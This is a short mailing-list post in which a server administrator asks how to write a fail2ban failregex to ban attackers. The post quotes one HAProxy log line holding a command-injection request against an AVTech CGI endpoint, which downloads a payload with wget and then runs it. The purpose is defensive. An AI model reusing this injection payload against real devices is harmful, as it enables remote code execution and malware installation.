I try to ban IPS that try to wget something into my server. how am i going to do the failregex? For example: Nov 20 18:04:28 ubuntu haproxy[12789]: ***********:39636 [20/Nov/2018:18:04:28.627] http_front http_back/main 286/0/4/25/315 400 392 - - ---- 0/0/0/0/0 0/0 "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip= google.com &port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://***********/avtechsh%20-O%20d4rk;%20chmod%20777%20d4rk;%20sh%20d4rk)&password=admin HTTP/1.1"
_______________________________________________ Fail2ban-users mailing list [email protected] https://lists.sourceforge.net/lists/listinfo/fail2ban-users
